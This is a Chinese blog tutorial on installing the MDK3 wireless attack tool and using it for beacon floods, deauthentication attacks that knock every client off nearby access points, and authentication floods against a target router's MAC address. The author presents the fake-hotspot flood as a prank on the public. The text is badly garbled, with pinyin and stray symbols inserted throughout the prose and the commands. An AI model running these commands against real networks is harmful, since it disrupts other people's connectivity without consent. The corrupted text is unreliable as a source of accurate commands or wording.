MDK3是(shì)?

　　MDK3 是(shì)一(yī)款無線DOS 攻擊測試工(‌>>✔gōng)具，能(néng)夠發起Beacon Flood、Authentication Do♦α‌→S、Deauthentication/Disassociation Amok 等模式的(de)♥π攻擊,另外(wài)它還(hái)具有(yǒu)針對★×γ(duì)隐藏ESSID 的(de)暴力探測模式、802.1X 滲透測試等功能(n™>éng)

　　安裝MDK3

　　打開(kāi)文(wén)件(jiàn) /etc/apt/sources.lisγ★✔≈t ，添加kali源：

運行(xíng)下(xià)面代碼

sudo gedit /etc/apt/sources.list

　　ubuntu系統安裝MDK3需要(yào)kali的(de)源， 我們在文($↕©wén)件(jiàn)末尾添加 源：

運行(xíng)下(xià)面代碼

deb http://mirrors.aliyun.com/kali sana main non-₽£✘free contrib  
deb http://mirrors.aliyun.com/kali-securityδ•&/ sana/updates main contrib non-free  
deb-src http://mirrors.aliyun.com/kali-securit♥₩y/ sana/updates main contrib non-free  

　　再執行(xíng)命令安裝：

運行(xíng)下(xià)面代碼

sudo apt-get install mdk3

 　　如(rú)果mdk3創建成功了(le)， 在命令行(xíng)↓±♦☆輸入 sudo mdk3 ，會(huì)出現(xiànδ¶₩ε)一(yī)下(xià)提示：

運行(xíng)下(xià)面代碼

MDK 3.0 v6 - "Yeah, well, whatever"
by ASPj of k2wrlz, using the osdep library from aircrack-ng
And with lots of help from the great aircrack-ng community:
Antragon, moon‍ gray, Ace, Zero_Chaos, Hirte, thefkbos♥>↑s, ducttape,
telek0miker, Le_ ♠☆βVert, sorbo, Andy Green, baha∞α>↔thir and Dawid Gajownik
THANK>↔δ$ YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
IMPORTANT: It is your responsibility to make sure you have •​Ω£permission from the
network owner before running MDK agai ↕πnst it.

This code is licenced under the GPLv2

₩δ
MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options
Try mdk3 --help <test_mode> for info about one test only

TEST MODES:
™©‍&b   - Beacon Flood Mode
      Sends b↕→←&eacon frames to show fake APs at clients.
"≤→
      This can sometimes cra ≈£$sh network scanners and even drivers!
a   - Authentication DoS mode
      Sends §₩α"authentication frames to all APs foun←≥d in range.
      Too much clients freez∑'e or reset some APs.
p   - Basic probing and ESSID Bruteforce©α∏ mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Brute≥ forcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks  •everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cance∞εls all traffic continuously
x★≤↑   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevent≠≥ion Systems
f   - MAC filter bruteforce mode
      Tδ his test uses a list of known client MAC​♠ Adresses and tries to
      a≠₹ uthenticate them to the given AP while dynamically changing
      its resp✘&onse timeout for best performance. It currently wo&↑rks only
      on APs who☆λ deny an open authentication request properly
gγα★   - WPA Downgrade test
      deauthenticates St≤∑±↑ations and APs sending WPA encrypted paβΩ×ckets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or d>' isable encryption.

　　使用(yòng)MDK3創建僞熱(rè)點AP

　　把網卡 wlx001d0f04f093 設定為(wèi)混雜(zá)模式， 網卡名字是(shì)參考ifconfig， 因為(wèi)沒一(yī)台計(jì)算(suàn)機(jī)網卡都(dōu)不'λ→(bù)同 ：

運行(xíng)下(xià)面代碼

sudo airmon-ng start wlx001d0f04f093

　　執行(xíng)這(zhè)個(gè)最最要(yào)的(de)命令， 創建一★£§•(yī)個(gè)名字為(wèi)：測試模拟WIFI 的(de) 熱(rè)點:

運行(xíng)下(xià)面代碼

sudo mdk3 mon0 b -n 測試WIFI -t -c 6 -s 80

　　創建一(yī)堆僞熱(rè)點AP， 首先需要(yào)一(yī)個("★&gè)文(wén)件(jiàn)， 文(wén)件(jiàn)裡(lǐ₽®)面保存了(le)所有(yǒu)的(de)WIIF名， 比如(rú)文(wén)件(jλ₹iàn)名為(wèi)wifis.txt , 內(nèi)容為(wèi)：

運行(xíng)下(xià)面代碼

白(bái)日(rì)依山(shān)盡
黃(huáng)河(↓ ¶✔hé)入海(hǎi)流
欲窮千裡(lǐ)目
更上(shàng)一(yī)層樓​β¶

　　如(rú)果前面已經執行(xíng) sudo airmon-ng start wlx001d0$≠∞f04f093 ，那(nà)就(jiù)不(bù)要(yào)再∏$•執行(xíng)，否者務必重新執行(xíng)一(yī)遍 ，然後構造π↑<mdk3的(de)命令:

運行(xíng)下(xià)面代碼

 sudo mdk3 mon0 b -f ./wifis.txt♥∞  -t -c 6 

　　然後就(jiù)可(kě)以出去(qù)惡搞啦， 弄一(yī)×÷γ堆WIFI騙人(rén)， 雖然這(zhè)個(gè)沒啥用(yòng)處 ><≤.<

　　攻擊WIIF熱(rè)點， 解除驗證攻擊

　　Deauthentication/Disassociation Amok 解除驗證攻擊，↔φ 在這(zhè)個(gè)模式下(xià)，軟件(jiànλ σ¥)會(huì)向周圍所有(yǒu)可(kě)見(jiàn)AP>$'發起循環攻擊......可(kě)以造成一(yī)定範圍內(nèi)的(de)無線網絡癱瘓

　　首先通(tōng)過sudo airodump-∑‍←ng mon0獲取要(yào)攻擊的(de)信道(dào)：

運行(xíng)下(xià)面代碼

sudo airodump-ng mon0

　　如(rú)果要(yào)攻擊信道(dào)為(wè∑≠i)11的(de)路(lù)由， 構造的(de)命令如(rú)下‌<±(xià)：

運行(xíng)下(xià)面代碼

sudo mdk3 mon0 d -c 11　　

　　解除驗證攻擊也(yě)可(kě)以設置白(bái)名單和(hé)黑(h∏÷≠λēi)名單， 讓指定的(de)AP不(bù)受該攻擊✔₽±的(de)影(yǐng)響， 具體(tǐ)可(kě)以參考幫助文(wén)檔：

運行(xíng)下(xià)面代碼

sudo mdk3 --help d

 　　Authentication Do✔>S

　　Authentication DoS，這(zh&₽$♣è)是(shì)一(yī)種驗證請(qǐng)求攻擊模式：在這(zhè) §個(gè)模式裡(lǐ)，軟件(jiàn)自(zì)動模∞€拟随機(jī)産生(shēng)的(de)mac向目标AP發起大(dà)量驗♦σ™"證請(qǐng)求，可(kě)以導緻AP忙于處理(lǐ)過 α多(duō)的(de)請(qǐng)求而停止對(duì)正"₽₩♦常連接客戶端的(de)響應， 如(rú)果路(lù)由不(&∏bù)死的(de)話(huà)，其實客戶上(shàng)網也(yě)是(shìφ•§≥)非常卡的(de)， 親身(shēn)經曆..

　　-a後面的(de)參數(shù)為(wèi) 目标AP的(de)‌¶'✘MAC地(dì)址：

運行(xíng)下(xià)面代碼

sudo mdk3 mon0 a -a 5C:63:BF:C4:A4:CE

作(zuò)者： NONO
出處：http://www.cnblogs.com/diligenceday/
企業(yè)網站(zhàn)：/
開(kāi)源博客：http://www.github.com/sqqihao
QQ：287101329
微(wēi)信：18101055830